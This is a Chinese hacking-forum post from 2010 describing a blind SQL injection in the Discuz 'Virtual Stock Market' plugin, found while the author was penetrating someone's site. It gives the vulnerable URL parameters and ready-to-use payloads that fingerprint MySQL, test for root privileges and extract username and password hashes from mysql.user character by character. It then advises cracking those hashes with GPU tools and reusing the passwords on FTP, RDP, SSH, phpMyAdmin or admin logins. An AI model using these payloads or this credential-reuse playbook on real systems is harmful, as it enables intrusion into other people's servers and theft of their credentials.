Board logo

标题: Discuz插件《虚拟股市》blind Injection注入漏洞利用 [打印本页]

作者: 柔肠寸断    时间: 2010-2-5 17:00     标题: Discuz插件《虚拟股市》blind Injection注入漏洞利用

漏洞的发现来自于对某站的渗透,由于其discuz版本为7.0,所以我只能把眼光聚焦在了它所安装的第三方插件上。  

经过简单的测试,就发现了《虚拟股市》存在注射漏洞:  
http://www.target.com/plugin.php ... _One&stockid=91 # 91为可变参数  
http://www.target.com/plugin.php ... ser_Show&uid=13 # 13为可变参数  

确认存在注射后开始尝试用order by猜解字段数,然后union select。但两个注射点都在字段数达到一定数目后,所执行的SQL语句发生了变化。原因是插件代码中有控制语句,使其跳转到另一行中执行。这种情况下,我们没办法获得字段数。  

思路有二:  
1.尝试盲注  
2.通过阅读《虚拟股市》这个插件的源码来确认其表结构和字段数  

但经过搜索发现,这个插件的作者在发布时用了zend对其源码进行了加密。而现有所有的解密工具都不是很理想(这也是无法搞清楚漏洞原理和细节的原因)。因此,只能采取盲注的手法(对我而言)。  

盲注费时间是没办法的,但我们会想,盲注能获得哪些信息呢?我的方法如下:  
#判断MYSQL版本,返回正常则为5,返回不正常则继续测试是否为4  
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and substring(@@version,1,1)=5  
#是否支持子查询(版本为4的情况下)  
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1)=1  
#当前用户是否为root  
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1 from mysql.user limit 0,1)=1  

下面就根据情况而异了:  
1. 假如数据库用户为root,则可以直接取出root密码HASH,然后破解。如果对方服务器3306开放,或者装有phpmyadmin,那么下一步不用说相信大家也知道了。如果没有开放3306,也没有安装phpmyadmin,那么可以用破解出来的密码猜测一下ftp密码,3389密码,或者SSH密码,又或者后台管理员密码,等等。  
2.假如数据库用户不为root,则直接取出discuz用户表cdb_members的管理员密码HASH,然后破解。  

#######取数据  
#mysql.user表第一行第一个字符的ASCII值是否大于80  
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),1,1))>80  
#第二个字符的ASCII值是否大于90  
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),2,1))>90  
…………  

就这样逐个猜,MYSQL4的密码HASH为16位MD5加密,MYSQL5的密码HASH为41位(加*号)。  

密码破解:  
1.MYSQL版本为4的话,这里有工具www.sqlhack.com,这个工具利用的是一个传说中的BUG,速度爆快。  
2.MYSQL 版本为5的话,我推荐用ighashgpu进行破解(貌似只用GPU,不用CPU),我AMD4核+HD 4650显卡,破解速度为60M/s,放到Inter Core i7 8核 + NVIDIA GeForce 9800GTX+平台上,速度是70M/s。而用passwordpro,速度才170w/s,这就是差距。7位纯字母我只用了7分多钟就破出来了。  

针对当时环境,我所能想到的利用办法就是这样了。如果有其他漏洞,或许可以更好的结合起来利用,从而达到一击必杀。最后,欢迎各位爱好渗透的朋友不吝赐教 :)




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2